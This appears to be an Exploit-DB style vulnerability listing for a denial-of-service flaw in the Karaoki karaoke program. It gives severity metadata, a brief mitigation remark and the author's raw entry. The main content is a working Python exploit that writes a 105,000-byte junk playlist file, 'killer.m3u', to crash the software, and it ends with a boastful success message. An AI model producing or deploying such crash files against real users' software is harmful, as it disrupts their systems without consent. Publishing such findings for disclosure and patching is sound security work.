Karaoki Denial of Service Vulnerability

vendor:

Karaoki

by:

ABDI MOHAMED

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Karaoki

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Ultimate

Karaoki Denial of Service Vulnerability

This exploit creates a file with the name 'killer.m3u' containing a large amount of junk data. This can lead to a denial of service attack on the Karaoki software.

Mitigation:

The vendor should release a patch to fix the vulnerability and prevent the denial of service attack.

Source

Exploit-DB raw data:

#Exploit Title :Karaoki Denial of Service Vulnerability
#Software : Karaoki
#Software link : http://software-files-l.cnet.com/s/software/11/43/82/66/pcdj_karaoki_setup_0.6.3819.exe?e=1287174968&h=9dd7fd008e533071b8d4874fd9a01487&lop=link&ptype=1901&ontid=18502&siteId=4&edId=3&spi=918adb963da1de63d1bfc9fd1a36ab5a&pid=11438266&psid=75072918&fileName=pcdj_karaoki_setup_0.6.3819.exe
#Autor : ABDI MOHAMED
#Email : abdimohamed@hotmail.fr
#Software version : n/a
#Tested on : Win7 Ultimate fr

#!/usr/bin/python
outfile="killer.m3u"
junk="\x41" * 105000
FILE=open(outfile, "w")
FILE.write(junk)
FILE.close()
print "[+] File created succesufully ,( the hacker is who create something !!! ) [+]"